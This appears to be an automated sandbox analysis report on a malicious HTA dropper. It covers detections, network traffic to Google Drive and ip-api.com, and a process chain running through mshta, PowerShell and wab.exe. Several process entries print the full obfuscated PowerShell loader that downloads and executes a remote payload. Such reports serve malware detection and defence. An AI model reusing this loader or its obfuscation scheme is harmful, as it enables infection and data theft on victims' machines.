Windows Analysis Report
orden_0099896754537687897657436786756785654576.hta

AV Detection

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source: orden_0099896754537687897657436786756785654576.hta

Virustotal: Detection: 8%

Perma Link

Compliance

Source: unknown	HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: svchost.exe, 00000004.00000002.2413923989.000001BF45E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatbXRhj
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1697395646.0000000004AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: unknown	HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2

System Summary

Source: amsi32_6504.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 6335
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6335
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 6335			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6335			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00CBFB98		1_2_00CBFB98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00CBF850		1_2_00CBF850
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248ACF38		17_2_248ACF38
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248A4A80		17_2_248A4A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248A3E68		17_2_248A3E68
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248A41B0		17_2_248A41B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_271A9B30		17_2_271A9B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_271A1808		17_2_271A1808
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_271A3080		17_2_271A3080

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: amsi32_6504.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@13/11@3/4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Ponos.Lsi

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltlxalh1.220.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1224
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: orden_0099896754537687897657436786756785654576.hta

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had 